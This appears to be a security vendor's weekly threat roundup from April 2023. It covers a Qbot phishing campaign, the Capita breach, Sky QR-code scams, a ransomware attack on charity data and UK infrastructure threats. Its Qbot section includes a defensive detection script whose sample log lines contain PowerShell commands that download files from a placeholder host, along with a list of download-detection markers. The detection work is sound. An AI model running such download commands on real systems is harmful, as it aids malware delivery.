Weekly Cyber News Roundup

April 17th to 21st 2023

Content

01. This week’s observation from our Incident Response Team 
02. News Bites
  • Capita shares tumble 7% over concerns recent hack was worse than admitted
  • Sky issues warning to UK customers over malicious QR code hack
  • Multiple charities' data stolen in ransomware attack
  • NCSC issues warning that UK Critical National Infrastructure is under severe threat from Russian-affiliated hackers
03. Conclusion

A Note From The Cyber Threat Response Team

There's been a significant increase in Qbot malware usage. The current campaign sees threat actors targeting companies through hijacked business emails. Attackers join legitimate email threads, persuading victims to download a PDF attachment, ultimately installing the Qbot trojan on their computers. Qbot, first discovered in 2007, is a banking trojan designed to steal banking credentials; since then it has gone through multiple modifications and improvements to become one of the most actively spread malware strains.

In this latest campaign the attackers use simulated business correspondence, making the messages harder to flag as spam and increasing the likelihood of victims falling for the scam. The campaign starts with a PDF file attachment that mimics a Microsoft Office 365 or Microsoft Azure alert. Opening the PDF downloads an archive containing a Windows Script File, which in turn launches a PowerShell payload that downloads the Qbot trojan.

Qbot was the most prevalent malware in March, impacting over 10% of organisations worldwide, highlighting just how effective it is. This latest campaign peaked between April 4 and April 12, with approximately 4,500 malicious emails detected. The campaign primarily targeted users in Germany, Argentina, and Italy but has also been observed in the UK and elsewhere.

The trojan is delivered via .one and .iso files instead of traditional Office documents with macros, bypassing defences because most security software looks for the latter. Adding to its effectiveness is the fact that it uses phishing as its primary infection path, a technique that remains the main route for successful cyber-attacks.
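The delivery chain described above (risky attachment types, an archive carrying a Windows Script File, and a script host launching PowerShell to fetch the payload) gives defenders two concrete things to look for. The script below is an added example written for this roundup, not code from Integrity360 or from any vendor: it triages attachment filenames and archive contents against the file types named in the text, and runs a simple parent/child process check over constructed process-creation events. The key=value event format, the field names and the sample events are all assumptions made for the example.

```python
"""Defender-side triage checks for the Qbot delivery chain described above.

Two checks, both driven by constructed sample data embedded below:
  1. attachment triage: flag file types the campaign abuses (.one, .iso, .wsf,
     and archives that contain a .wsf script);
  2. process-chain detection: flag a Windows Script Host process (wscript.exe /
     cscript.exe) spawning PowerShell with a download-style command line.
The log format and field names are assumptions for this example, not any
EDR or Sysmon schema.
"""
import io
import re
import zipfile

# File types the campaign is reported to use instead of macro-bearing Office files.
RISKY_EXTENSIONS = {".one", ".iso", ".wsf"}


def _ext(name):
    """Lower-cased final extension of a filename ('' if none); handles double extensions."""
    name = name.lower()
    i = name.rfind(".")
    return name[i:] if i >= 0 else ""


def triage_attachment(filename, data):
    """Return the reasons an attachment deserves a closer look (empty list = none)."""
    reasons = []
    ext = _ext(filename)
    if ext in RISKY_EXTENSIONS:
        reasons.append(f"risky attachment type {ext}")
    if ext == ".zip":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for member in zf.namelist():
                    if _ext(member) in RISKY_EXTENSIONS:
                        reasons.append(f"archive contains {member}")
        except zipfile.BadZipFile:
            reasons.append("archive is not a valid zip")
    return reasons


def build_sample_archive():
    """Construct an in-memory zip holding an inert .wsf, mirroring the archive stage."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Office365_alert.wsf", "placeholder script body (constructed, inert)")
    return buf.getvalue()


# Constructed process-creation events, one per line (format is an assumption).
SAMPLE_EVENTS = r"""
parent="C:\Windows\System32\wscript.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/x.dat','C:\Users\Public\x.dat')"
parent="C:\Windows\explorer.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell -c Get-ChildItem"
parent="C:\Windows\System32\cscript.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell Invoke-WebRequest http://example.invalid/a -OutFile a.dll"
parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" image="C:\Windows\System32\notepad.exe" cmd="notepad.exe readme.txt"
"""

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")
# Substrings that indicate PowerShell is being used to pull something from the network.
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest",
                    "iwr ", "net.webclient", "start-bitstransfer")
EVENT_RE = re.compile(r'parent="([^"]*)" image="([^"]*)" cmd="([^"]*)"')


def parse_events(text):
    """Parse the key=value lines into dicts; lines that do not match are skipped."""
    events = []
    for line in text.strip().splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            events.append({"parent": m.group(1), "image": m.group(2), "cmd": m.group(3)})
    return events


def is_script_host_download(event):
    """True when a script host spawns PowerShell with a download-style command line."""
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    image = event["image"].lower().rsplit("\\", 1)[-1]
    cmd = event["cmd"].lower()
    return (parent in SCRIPT_HOSTS and image in POWERSHELL
            and any(marker in cmd for marker in DOWNLOAD_MARKERS))


def detect_script_host_downloads(text):
    """Return every event in the log text that matches the WSF -> PowerShell download pattern."""
    return [e for e in parse_events(text) if is_script_host_download(e)]


if __name__ == "__main__":
    print(triage_attachment("invoice.zip", build_sample_archive()))
    print(triage_attachment("statement.pdf", b"%PDF-1.7"))
    for e in detect_script_host_downloads(SAMPLE_EVENTS):
        print("ALERT:", e["parent"], "->", e["image"], "|", e["cmd"][:60])
```

The attachment check is deliberately based on the final extension so that double extensions such as `alert.pdf.wsf` are caught; the process check keys on the parent/child pair rather than on the script's contents, which is what survives when the script itself is obfuscated.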


Installing antivirus software on your devices is essential for protection against malware and as Qbot is frequently distributed through spam campaigns, being vigilant about the signs of malicious emails is crucial.

Quick News Bites

Capita shares tumble 7% over concerns recent hack was worse than admitted

Capita PLC (LSE:CPI) stock experienced a 7% decline following allegations that the recent cyber attack on the company was more severe than initially disclosed.

Personal banking information, residential addresses, and passport images are now being leaked online, seemingly pilfered by the hacker collective Black Basta.

Capita, holding £6.5 billion in government contracts with entities such as the NHS, the military, and the Cabinet Office, is responsible for managing the personal information of millions of citizens.

While the company acknowledged the breach earlier in the month, it maintained that individuals' personal data remained protected, and Capita's CEO even tweeted that the company's response "will go down as a case history for how to deal with a sophisticated cyberattack".

Nonetheless, security specialists demonstrated that pages of data allegedly acquired from Capita were being offered for purchase on the dark web through Black Basta's site.

This collection of data encompasses individuals' phone numbers, over 100 bank accounts with their respective sort codes, and residential addresses.

These documents seem to be a fraction of the total data obtained, as the website indicates that additional access can be purchased using bitcoin.

The leaked information contains personal details of teachers seeking employment at schools, as well as bank account information for individuals and companies that supply Capita with products or services.

Sky issues warning to UK customers over malicious QR code hack

UK Sky subscribers are being cautioned about a harmful hacking technique employed by cybercriminals. The television provider has issued a high-level warning after discovering a clever scam that is easy to fall for and could result in significant financial loss for customers.

Sky, like many other companies, offers a QR code for customers to scan with their smartphones, simplifying and streamlining the account login process. However, it appears that cybercriminals have become aware of this approach and are now distributing counterfeit QR codes disguised as Sky's, directing customers to fraudulent websites.

On these imitation websites, designed to closely resemble Sky's legitimate sites, users' personal information - such as names, passwords, and bank account numbers - is then stolen.

Sky stated in an announcement that as long as customers only use their phone's built-in camera to scan the code, they should not encounter any problems. The issues arise when individuals opt to use specialised QR scanner apps found in online app stores, which often claim to offer enhanced features, making it simpler for scammers to access data on the user's phone.

Multiple charities' data stolen in ransomware attack

A probe has commenced into a ransomware assault on a Northern Irish data management firm, Evide, which stores information for non-profit organizations and charities, including several groups assisting survivors of sexual assault.

On March 30th, the PSNI was alerted to a cyber event and assigned the case to their Cyber Crime Investigation Team's expert detectives, who are continuing their inquiries.

Evide offers data management services to its clients, with annual fees ranging from £720 to £1,200, as stated on the company's website.

The National Cyber Security Centre and the Data Protection Commission have been informed about the security breach.

Ossian Smyth, Minister of State for eGovernment, spoke with RTÉ's News at One, confirming that several organisations in the Republic of Ireland have been affected.

"Among them are community and voluntary groups, and four focus on addressing sexual abuse and rape," Smyth mentioned.

"For individuals who utilize these services or have entrusted their data to these organisations, I understand their concern, as they have shared highly confidential and personal information," he added.

Smyth revealed that the personal information of 2,000 people in the Republic of Ireland has been compromised by the cyberattack.

He further stated that the PSNI in Northern Ireland is conducting a criminal investigation into the incident, in collaboration with An Garda Síochána.

"Everyone whose data has been compromised will be notified," he assured.

NCSC issues warning that UK Critical National Infrastructure is under severe threat from Russian-affiliated hackers

Cabinet Office Minister Oliver Dowden has warned that Russia-aligned hackers aim to disrupt or destroy the UK's critical infrastructure, with a growing focus on the nation in recent months. To combat this threat, new measures have been introduced to bolster businesses at the forefront of cyber defense. The National Cyber Security Centre (NCSC), part of the UK's cyber and intelligence agency GCHQ, issued a threat alert to critical businesses, urging organizations responsible for energy and water supplies to take immediate action to protect against this emerging cyber risk.

The NCSC identifies these hacking groups as ideologically motivated, often sympathizing with Russia's invasion of Ukraine. These groups, described as "Wagner-like," are deemed less predictable due to their independence from formal state control. The NCSC anticipates that these groups will seek opportunities to create significant disruption, especially if systems are inadequately protected.

Addressing the CyberUK conference in Belfast, Dowden stressed the importance of disclosing this threat to ensure businesses comprehend the risks and take necessary action. As Chancellor of the Duchy of Lancaster, he announced plans to establish cyber resilience targets for critical sectors to achieve within two years, extending resilience regulations to private sector businesses involved in critical infrastructure.

Lindy Cameron, CEO of the NCSC, emphasized the need to protect the UK's critical national infrastructure from hackers and prepare for potential future threats. She acknowledged recent low-level attempts to target UK infrastructure and the need for heightened security and resilience, given the increasing cyber activity in Ukraine due to Russia's conflict.

Closing Summary

If you are worried about any of the threats outlined in this bulletin or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager, or alternatively get in touch to find out how you can protect your organisation.

Disclaimer

The Threat Intel Roundup was prepared by Integrity360 summarising threat news as we observe it, current at the date of publishing. It should not be considered to be legal, consulting or any other professional advice. Any recommendations should be considered in the context of your own organisation. Integrity360 does not take any political stance in the information that we share. Moreover, the opinions expressed may not necessarily be the views of Integrity360.

Need advice?

If you are worried about any of the threats outlined in this roundup or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager or fill in the form for a complimentary no-commitment consultation.

More detailed threat intelligence news?

If you’d like more detailed threat intelligence news, Integrity360 offers this as part of our security monitoring managed services.

We also offer a tailored threat intelligence monitoring service for your organisation that actively monitors for threat actors and campaigns of direct relevance to your organisation, brand damage, copycat & spoofed domains, credential leakage and dark web monitoring.


Cyber Security Conference

LONDON | 28 April 2022
DUBLIN | 11 May 2022

Join us in Dublin or London for the Security First 2022 conference.  We'll be bringing together industry professionals and specialist experts to discuss the latest cyber security trends and offer actionable advice on preparing your business to put security first in 2022.